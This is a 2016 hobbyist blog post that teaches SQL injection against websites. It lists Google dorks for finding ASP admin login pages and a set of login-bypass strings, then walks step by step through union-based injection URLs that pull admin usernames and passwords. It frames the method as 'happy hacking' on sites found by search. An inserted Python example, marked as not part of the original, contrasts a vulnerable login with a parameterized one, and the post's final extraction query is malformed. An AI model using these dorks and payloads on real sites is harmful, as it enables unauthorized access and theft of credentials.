Friday, 26 August 2016

Sql Injection


Hello guys, this is my first blog and I am very excited, even if not very confident about what to share with you people.
But since I have some decent knowledge in the field of hacking, let's start with some very basic website
hacking tricks. ;)
Let's look at one of the most popular topics: SQL injection.

So, what is SQL injection?
Injecting SQL into a query that an application builds from user input, either to read data out of its database or to bypass authentication as an admin, is called
SQL injection.
I will show it in 2 parts.

Part 1: Basic SQL injection


Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp.
First we need to find a site, so start by opening Google.
Now we type our dork (definition of dork: a search entry for a certain type of site/exploit etc.).
There are a large number of Google dorks for basic SQL injection.
Here are the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now, what to do once we get to our site.
The site should look something like this:

welcome to xxxxxxxxxx administrator panel
username:
password:

So what we do here is: in the username field we always type the SQL injection,
and in the password field we also type our SQL injection.

Here is a list of SQL injections:

1'or'1'='1
'x or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'


There are many more, but these are the best ones that I know of.
What this SQL injection is doing: confusing the fuck out of the database till it gives you auth bypass.

So your input should look like this:

username: 1'or'1'='1
password: 1'or'1'='1

So click submit and you're in.


NOTE: not all sites are vulnerable.
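To see why the bypass strings above work and what stops them, here is an added example that is not part of the original post: a minimal login check in Python with sqlite3, once with the input spliced into the SQL text and once with placeholders. The table and column names (useraccounts, uname, upassword) are taken from part 2 of the post; the sample rows are constructed.

```python
import sqlite3

# Constructed sample rows; real code would store and compare a password
# hash, omitted here to keep the focus on the injection itself.
SAMPLE_USERS = [("admin", "correct horse battery staple"), ("alice", "hunter2")]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database with the post's useraccounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE useraccounts (uname TEXT, upassword TEXT)")
    conn.executemany("INSERT INTO useraccounts VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    # BAD: the input is pasted into the SQL text. The quote in 1'or'1'='1
    # closes the string literal and the rest is parsed as SQL, so the WHERE
    # clause becomes  uname='1' or '1'='1' and ...  which is true for every row.
    sql = ("SELECT uname FROM useraccounts WHERE uname = '%s' "
           "AND upassword = '%s'" % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    # GOOD: placeholders send the input as data, never as SQL text; the quote
    # is just a character to compare against, so no account matches.
    sql = "SELECT uname FROM useraccounts WHERE uname = ? AND upassword = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run the post's 1'or'1'='1 input through both versions of the check."""
    conn = make_db()
    payload = "1'or'1'='1"  # the bypass string the post recommends typing
    return {
        "vulnerable_with_payload": vulnerable_login(conn, payload, payload),
        "safe_with_payload": safe_login(conn, payload, payload),
        "safe_with_real_creds": safe_login(conn, "alice", "hunter2"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

The vulnerable version logs the payload in as the first account in the table; the parameterized version rejects it while still accepting real credentials.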


Part 2: injecting SQL queries to extract the admin username and password
                (also called manual SQL injection)


OK, so let's say we have a site:

 http://www.site.com/departmentindex.php?id=-48'

Functions used:
database()     || for finding the database name
version()      || for finding the version of the DB
user()         || for finding the DB user the application connects as
group_concat() || for collecting several result values into one string

Step 1: find the parameter value || something=something
       EX:
 http://www.site.com/departmentindex.php?id=-48'          select * from products where id=48;
         http://www.site.com/departmentindex.php?id=-48' is just an example

Step 2: apply a single quote '
       EX:
 http://www.site.com/departmentindex.php?id=-48'

Step 3: find the number of columns
      id=15 order by 1-- || for union based SQLi
      id=15'order by 1-- - || for string based SQLi

 http://www.site.com/departmentindex.php?id=-48'order by 16-- -

Step 4: now find the vulnerable column

 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

Step 5: now find the tables

 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15 from information_schema.table_constraints-- -

Step 6: now find the columns

 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15 from information_schema.columns where table_name='useraccounts'-- -

Step 7: fetching data

 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(uname,upassword),8,9,10,11,12,13,14,15 from table_name='useraccounts'-- -

And you will get the admin account login and password.

You can also do this with an automated tool; maybe I can show it to you in a future post.

happy hacking ;p

NOTE: you can even offer me work training you in ethical hacking on shubhamchoudharyhacker.com

4 comments:

  1. Nice post sir g... It will help further
